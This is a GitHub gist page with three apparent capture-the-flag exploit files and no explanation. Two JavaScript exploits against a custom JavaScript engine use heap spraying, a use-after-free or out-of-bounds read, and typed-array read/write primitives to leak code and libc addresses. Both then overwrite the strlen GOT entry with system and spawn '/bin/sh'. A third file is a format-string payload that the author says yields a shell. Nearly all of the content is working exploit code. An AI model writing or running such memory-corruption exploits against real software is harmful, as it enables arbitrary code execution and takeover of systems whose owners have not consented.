Created
June 6, 2021 04:32
-
-
Save hkraw/b80cf80c2cc83c63d57a1fa86619b79a to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function pwn() { | |
| /* Helpers */ | |
| var k_jsObjectSize = 0x70 | |
| var fclose_got = 0x45e58 | |
| var __libc_atoi = 0x18ea90 | |
| var __libc_environ = 0x1ef2e0 | |
| var __free_got = 0x4dde0 | |
| var __je_free = 0x13b10 | |
| var heapSpray = function(size, nums) { | |
| var s = [] | |
| for(var i = 0; i < nums; i++) { | |
| var str = "" | |
| for(var j = 0; j < size; j++) { | |
| str += "A" | |
| } | |
| s.push(s) | |
| } | |
| } | |
| Number.prototype.hex = function() { | |
| return this.toString(16) | |
| } | |
| heapSpray(0x70, 0x20) | |
| gc(); gc(); | |
| var ab = new ArrayBuffer(0x70) | |
| var uint16_t = new Uint16Array(ab) | |
| /* Leak Code */ | |
| var dump = {} | |
| for(var j = 0; j < 0xffff; j++) { | |
| var k = uint16_t.Includes(j) | |
| if(k != undefined) { | |
| dump[k] = j | |
| } | |
| } | |
| __code_leak = parseInt("0x"+dump["62"].hex()+dump["61"].hex()+dump["60"].hex(),0) | |
| __code_base = __code_leak - 0x460a0 /* Sentinal */ | |
| print('[*] Code @ 0x' + __code_base.hex()) | |
| var uint16_t_2 = new Uint16Array(ab) | |
| uint16_t_2.set(72, (__code_leak&0xffff) - 0x248) | |
| uint16_t_2.set(73, (__code_leak>>16)&0xffff) | |
| uint16_t_2.set(74, dump["62"]) | |
| uint16_t_2.set(76,3) | |
| var leak = {} | |
| for(var i = 0; i < 0xffff; i++) { | |
| var k = uint16_t.Includes(i) | |
| if(k != undefined) { | |
| leak[k] = i | |
| } | |
| } | |
| var __libc_leak = parseInt("0x"+leak["2"].hex()+leak["1"].hex()+leak["0"].hex()) | |
| var __libc_base = __libc_leak - 0x84f50 | |
| var __strlen_libc_got = __libc_base + 0x1eb0a8 | |
| var __system = __libc_base + 0x55410 | |
| print('[*] libc @ 0x'+__libc_base.hex()) | |
| uint16_t_2.set(72, (__strlen_libc_got&0xffff)) | |
| uint16_t_2.set(73, (__strlen_libc_got>>16)&0xffff) | |
| uint16_t_2.set(74, leak["2"]) | |
| uint16_t.set(0, __system&0xffff) | |
| uint16_t.set(1, (__system>>16)&0xffff) | |
| uint16_t.set(2, leak["2"]) | |
| print('/bin/sh') | |
| for(;;){} | |
| } | |
| pwn() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function pwn() { | |
| /* Helpers */ | |
| var k_jsObjectSize = 0x70 | |
| var __memset_got = 0x43e98 | |
| var __libc_memset = 0x18eaf0 | |
| var __libc_environ = 0x1ef2e0 | |
| var __free_got = 0x4dde0 | |
| var __je_free = 0x13b10 | |
| var heapSpray = function(size, nums) { | |
| var s = [] | |
| for(var i = 0; i < nums; i++) { | |
| s[i] = new Uint32Array(size) | |
| s[i].fill(0x41414141) | |
| } | |
| } | |
| var uaf = function(ab) { | |
| new Uint32Array(ab) | |
| } | |
| Number.prototype.hex = function() { | |
| return this.toString(16) | |
| } | |
| /* ====================================== Exploit ===================================== */ | |
| heapSpray(k_jsObjectSize/4, 0x10) | |
| gc() | |
| var ab = new ArrayBuffer(k_jsObjectSize) | |
| uaf(ab) | |
| gc() /* ab->backingStore is a dangling pointer now */ | |
| /* Replace UAF memory */ | |
| var target_ta = [] | |
| for(var i = 0; i < 0x100; i++) { | |
| target_ta.push(new Uint32Array(0x10)) | |
| target_ta[i].fill(0x41414141) | |
| } | |
| var replaced = new Uint32Array(ab) | |
| var __codeleak_lower32 = replaced.get(2) | |
| var __codeleak_high32 = replaced.get(3) | |
| var __codebase = [__codeleak_high32, __codeleak_lower32 - 0x440a0] /* Sentinal addr */ | |
| print('[*] code @ 0x' + __codebase[0].hex()+__codebase[1].hex()) | |
| /* arbitrary read / write helper */ | |
| var abRead = function(where) { | |
| replaced.set(8, where[1]) | |
| replaced.set(9, where[0]) | |
| for(var i = 0; i < 0x100; i++) { | |
| if(target_ta[i].get(0) != 0x41414141) | |
| return [ | |
| target_ta[i].get(0), | |
| target_ta[i].get(1) | |
| ] | |
| } | |
| } | |
| var abWrite = function(what, where) { | |
| replaced.set(8, where[1]) | |
| replaced.set(9, where[0]) | |
| for(var i = 0; i < 0x100; i++) | |
| if(target_ta[i].get(0) != 0x41414141) { | |
| target_ta[i].set(0, what[0]) | |
| target_ta[i].set(1, what[1]) | |
| } | |
| } | |
| var atoi = abRead([__codebase[0],__codebase[1]+atoi_got]) | |
| var __libc_base = [atoi[1], atoi[0]-__libc_memset] | |
| print('[*] atoi @ 0x' + atoi[1].hex()+atoi[0].hex()) | |
| print('[*] libc @ 0x'+__libc_base[0].hex()+__libc_base[1].hex()) | |
| var __libc_system = 0x55410 | |
| var system = [__libc_base[1]+__libc_system,__libc_base[0]] | |
| var __strlen_libc_got = [__libc_base[0],__libc_base[1]+0x1eb0a8] | |
| abWrite(system, __strlen_libc_got) | |
| print('/bin/sh') | |
| for(;;) {} | |
| } | |
| pwn() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| printf("Just send this a few times and you will get a shell"); | |
| fmt = "%c%c%c%5c%hhn%186326c%*8$d%5$n" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment